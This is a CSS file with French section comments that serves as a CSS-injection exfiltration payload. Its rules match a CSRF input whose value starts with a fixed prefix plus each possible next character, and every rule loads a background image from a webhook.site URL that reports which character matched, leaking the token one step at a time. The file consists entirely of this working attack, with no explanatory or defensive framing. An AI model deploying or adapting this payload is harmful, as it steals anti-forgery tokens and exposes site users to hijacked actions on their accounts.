/* Minuscules */
input[name=csrf][value^="ruW-tjL1Ba"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a); }
input[name=csrf][value^="ruW-tjL1Bb"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b); }
input[name=csrf][value^="ruW-tjL1Bc"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c); }
input[name=csrf][value^="ruW-tjL1Bd"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d); }
input[name=csrf][value^="ruW-tjL1Be"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e); }
input[name=csrf][value^="ruW-tjL1Bf"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f); }
input[name=csrf][value^="ruW-tjL1Bg"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g); }
input[name=csrf][value^="ruW-tjL1Bh"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?h); }
input[name=csrf][value^="ruW-tjL1Bi"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?i); }
input[name=csrf][value^="ruW-tjL1Bj"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?j); }
input[name=csrf][value^="ruW-tjL1Bk"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?k); }
input[name=csrf][value^="ruW-tjL1Bl"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?l); }
input[name=csrf][value^="ruW-tjL1Bm"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?m); }
input[name=csrf][value^="ruW-tjL1Bn"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?n); }
input[name=csrf][value^="ruW-tjL1Bo"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?o); }
input[name=csrf][value^="ruW-tjL1Bp"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?p); }
input[name=csrf][value^="ruW-tjL1Bq"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?q); }
input[name=csrf][value^="ruW-tjL1Br"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?r); }
input[name=csrf][value^="ruW-tjL1Bs"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?s); }
input[name=csrf][value^="ruW-tjL1Bt"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?t); }
input[name=csrf][value^="ruW-tjL1Bu"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?u); }
input[name=csrf][value^="ruW-tjL1Bv"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?v); }
input[name=csrf][value^="ruW-tjL1Bw"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?w); }
input[name=csrf][value^="ruW-tjL1Bx"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?x); }
input[name=csrf][value^="ruW-tjL1By"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?y); }
input[name=csrf][value^="ruW-tjL1Bz"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?z); }

/* Majuscules */
input[name=csrf][value^="ruW-tjL1BA"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?A); }
input[name=csrf][value^="ruW-tjL1BB"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?B); }
input[name=csrf][value^="ruW-tjL1BC"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?C); }
input[name=csrf][value^="ruW-tjL1BD"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?D); }
input[name=csrf][value^="ruW-tjL1BE"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?E); }
input[name=csrf][value^="ruW-tjL1BF"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?F); }
input[name=csrf][value^="ruW-tjL1BG"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?G); }
input[name=csrf][value^="ruW-tjL1BH"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?H); }
input[name=csrf][value^="ruW-tjL1BI"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?I); }
input[name=csrf][value^="ruW-tjL1BJ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?J); }
input[name=csrf][value^="ruW-tjL1BK"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?K); }
input[name=csrf][value^="ruW-tjL1BL"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?L); }
input[name=csrf][value^="ruW-tjL1BM"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?M); }
input[name=csrf][value^="ruW-tjL1BN"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?N); }
input[name=csrf][value^="ruW-tjL1BO"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?O); }
input[name=csrf][value^="ruW-tjL1BP"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?P); }
input[name=csrf][value^="ruW-tjL1BQ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Q); }
input[name=csrf][value^="ruW-tjL1BR"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?R); }
input[name=csrf][value^="ruW-tjL1BS"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?S); }
input[name=csrf][value^="ruW-tjL1BT"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?T); }
input[name=csrf][value^="ruW-tjL1BU"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?U); }
input[name=csrf][value^="ruW-tjL1BV"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?V); }
input[name=csrf][value^="ruW-tjL1BW"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?W); }
input[name=csrf][value^="ruW-tjL1BX"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?X); }
input[name=csrf][value^="ruW-tjL1BY"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Y); }
input[name=csrf][value^="ruW-tjL1BZ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Z); }

/* Chiffres */
input[name=csrf][value^="ruW-tjL1B0"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?0); }
input[name=csrf][value^="ruW-tjL1B1"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?1); }
input[name=csrf][value^="ruW-tjL1B2"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?2); }
input[name=csrf][value^="ruW-tjL1B3"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?3); }
input[name=csrf][value^="ruW-tjL1B4"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?4); }
input[name=csrf][value^="ruW-tjL1B5"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?5); }
input[name=csrf][value^="ruW-tjL1B6"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?6); }
input[name=csrf][value^="ruW-tjL1B7"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?7); }
input[name=csrf][value^="ruW-tjL1B8"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?8); }
input[name=csrf][value^="ruW-tjL1B9"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?9); }

/* Caractères spéciaux */
input[name=csrf][value^="ruW-tjL1B-"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?-); }
input[name=csrf][value^="ruW-tjL1B_"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?_); }
input[name=csrf][value^="ruW-tjL1B."] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?.); }
input[name=csrf][value^="ruW-tjL1B~"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?~); }
input[name=csrf][value^="ruW-tjL1B!"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?!); }
input[name=csrf][value^="ruW-tjL1B@"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?@); }
input[name=csrf][value^="ruW-tjL1B#"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?#); }
input[name=csrf][value^="ruW-tjL1B$"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?$); }
input[name=csrf][value^="ruW-tjL1B%"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?%25); } /* % encodé */
input[name=csrf][value^="ruW-tjL1B^"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?^); }
input[name=csrf][value^="ruW-tjL1B&"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?&); }
input[name=csrf][value^="ruW-tjL1B*"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?*); }
